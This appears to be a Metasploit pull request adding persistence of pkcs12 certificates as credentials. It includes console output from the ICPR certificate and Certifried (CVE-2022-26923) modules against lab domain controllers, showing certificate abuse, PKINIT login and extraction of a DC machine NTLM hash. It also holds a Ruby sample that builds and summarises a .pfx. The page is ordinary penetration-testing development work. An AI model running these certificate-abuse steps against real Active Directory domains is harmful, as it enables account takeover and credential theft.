metasploit-framework
Persist icpr cert as pkcs12 credential
Add support for persisting pkcs12 credentials in Metasploit. Updates the admin/dcerpc/icpr_cert
module to persist requested certificates.
Depends on https://github.com/rapid7/metasploit-credential/pull/169
Example:
msf6 auxiliary(admin/dcerpc/icpr_cert) > rerun smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13 ca=adf3-DC3-CA cert_template=ESC1-Test smbdomain=ADF3.LOCAL [email protected]
[*] Reloading module...
[*] Running module against 192.168.123.13
[*] 192.168.123.13:445 - Requesting a certificate...
[+] 192.168.123.13:445 - The requested certificate was issued.
[*] 192.168.123.13:445 - Certificate UPN: [email protected]
[*] 192.168.123.13:445 - Certificate stored at: /Users/adfoster/.msf4/loot/20221209012934_default_unknown_windows.ad.cs_070132.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > creds
Credentials
===========
host            origin          service        public                  private                                                                realm  private_type  JtR Format
----            ------          -------        ------                  -------                                                                -----  ------------  ----------
192.168.123.13  192.168.123.13  445/tcp (smb)  [email protected]  subject: /CN=Administrator,issuer: /DC=local/DC=adf3/CN=adf3-DC3-CA         Pkcs12 (pfx)
The pfx base64 blob is output with creds -v or creds -o foo.txt once https://github.com/rapid7/metasploit-framework/pull/17355 is merged.
Verification
- Ensure the database is connected
- Ensure bundle exec rails db:migrate has been run
- Follow the steps from https://github.com/rapid7/metasploit-framework/pull/17240 and verify that the output of the creds command
This will most likely land into master after the kerberos branch is merged, taking off the feature label for now :+1:
I'm running into an error here:
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run
[*] Running module against 192.168.176.3
[+] [2023.04.12-11:44:19] 192.168.176.3:445 - Successfully authenticated to LDAP (192.168.176.3:636)
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully created windomain.local\DESKTOP-EPLXTSOP$
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Password: mb4WQRCUxMUP5Uz1Yuhl2YZVQa3tazYf
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - SID: S-1-5-21-2380665626-1154582258-49301182-1149
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully authenticated to LDAP (192.168.176.3:636)
[*] [2023.04.12-11:44:22] 192.168.176.3:445 - Attempting to set the DNS hostname for the computer DESKTOP-EPLXTSOP$ to the DNS hostname for the DC: dc2019
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully changed the DNS hostname
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - The requested certificate was issued.
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Certificate SID: S-1-5-21-2380665626-1154582258-49301182-1149
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Certificate stored at: /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_windows.ad.cs_298084.pfx
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Attempting PKINIT login for [email protected]
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - Successfully authenticated with certificate
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:445 - TGT MIT Credential Cache ticket saved to /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_mit.kerberos.cca_288354.bin
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Trying to retrieve NT hash for dc2019$
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:88 - Received a valid TGS-Response
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:445 - TGS MIT Credential Cache ticket saved to /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_mit.kerberos.cca_236126.bin
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - Found NTLM hash for dc2019$: aad3b435b51404eeaad3b435b51404ee:ab60af0d9ee0336f8cc7df44c9f7caed
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Deleting the computer account DESKTOP-EPLXTSOP$
[+] [2023.04.12-11:44:25] 192.168.176.3:445 - The specified computer has been deleted.
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Call stack:
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:425:in `report_ntlm'
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:421:in `get_ntlm_hash'
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:124:in `run'
[*] Auxiliary module execution completed
https://github.com/rapid7/metasploit-framework/blob/2d30909a2f98435f1a01961cfd6a5a67be734eb1/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb#L425
FWIW though it did correctly add the PFX to the database
> I'm running into an error here: ... [-] [2023.04.12-11:44:25] 192.168.176.3:445 - Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes
Looks like a regression from https://github.com/rapid7/metasploit-framework/pull/17784 - will put up a separate PR to fix
Tested all the scenarios, works well for me
Release Notes
Adds support for persisting pkcs12 credentials in Metasploit, i.e. .pfx/.p12 files. The auxiliary/admin/dcerpc/icpr_cert and auxiliary/admin/dcerpc/cve_2022_26923_certifried modules will now persist requested certificates for future exploitation. The creds command can also directly persist certificates - for example: creds add user:alice pkcs12:/path/to/certificate.pfx
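As an added illustration of what a persisted Pkcs12 credential carries (not code from this PR or from metasploit-framework), the Ruby below builds a stand-in .pfx with a UPN in its subjectAltName, then reads it back the way the creds table above presents it: the UPN as the public part, a subject/issuer summary as the private part, and the base64 blob that creds -v prints. The UPN [email protected], subject /CN=alice, the PKCS12 password changeit and the hash keys are constructed for the example; only the issuer name is taken from the page. The certificate is self-signed here, whereas icpr_cert obtains a CA-signed one, and the UPN is read by walking the extension DER so it does not depend on whether the local OpenSSL pretty-prints the Microsoft otherName.

```ruby
require 'openssl'
require 'base64'

# Microsoft User Principal Name otherName OID used in AD CS certificates.
MS_UPN_OID = '1.3.6.1.4.1.311.20.2.3'.freeze

# Build a self-signed certificate carrying a UPN in subjectAltName and wrap it
# with its key in a PKCS12 bundle, standing in for a .pfx fetched from a CA.
# The UPN, subject, and password are constructed values for this example;
# the issuer DN is the one shown in the creds table on this page.
def build_sample_pfx(upn: '[email protected]',
                     subject: '/CN=alice',
                     issuer: '/DC=local/DC=adf3/CN=adf3-DC3-CA',
                     password: 'changeit')
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.parse(subject)
  cert.issuer     = OpenSSL::X509::Name.parse(issuer)
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600

  # Same OpenSSL config syntax a CSR for an ESC1-style request would use.
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  cert.add_extension(
    ef.create_extension('subjectAltName', "otherName:#{MS_UPN_OID};UTF8:#{upn}", false)
  )
  cert.sign(key, OpenSSL::Digest.new('SHA256')) # self-signed stand-in for a CA signature

  OpenSSL::PKCS12.create(password, 'icpr-cert', key, cert).to_der
end

# Extract the UPN from the certificate's subjectAltName by decoding the DER:
#   Extension  ::= SEQUENCE { extnID OID, critical BOOLEAN OPTIONAL, extnValue OCTET STRING }
#   otherName  ::= [0] IMPLICIT SEQUENCE { type-id OID, value [0] EXPLICIT ANY }
def certificate_upn(cert)
  san = cert.extensions.find { |e| e.oid == 'subjectAltName' }
  return nil unless san

  extn_value    = OpenSSL::ASN1.decode(san.to_der).value.last.value
  general_names = OpenSSL::ASN1.decode(extn_value).value
  general_names.each do |gn|
    next unless gn.tag == 0 && gn.tag_class == :CONTEXT_SPECIFIC

    type_id, wrapped = gn.value
    next unless type_id.oid == MS_UPN_OID

    return wrapped.value.first.value
  end
  nil
end

# Summarise a .pfx the way the creds table columns present a Pkcs12 credential.
# The hash keys are named after those columns for illustration only; they are
# not Metasploit's storage model.
def summarize_pfx(pfx_der, password)
  p12  = OpenSSL::PKCS12.new(pfx_der, password)
  cert = p12.certificate
  {
    public: certificate_upn(cert),
    private: "subject: #{cert.subject},issuer: #{cert.issuer}",
    private_type: 'Pkcs12 (pfx)',
    pfx_base64: Base64.strict_encode64(pfx_der)
  }
end

if $PROGRAM_NAME == __FILE__
  pfx = build_sample_pfx
  summarize_pfx(pfx, 'changeit').each do |column, value|
    value = "#{value[0, 40]}..." if column == :pfx_base64
    puts "#{column}: #{value}"
  end
end
```

The base64 column is the whole PKCS12 DER, so anyone who can read the creds output (or a creds -o export) can reconstruct the .pfx and authenticate with it via PKINIT; treat the database dump with the same care as the loot file.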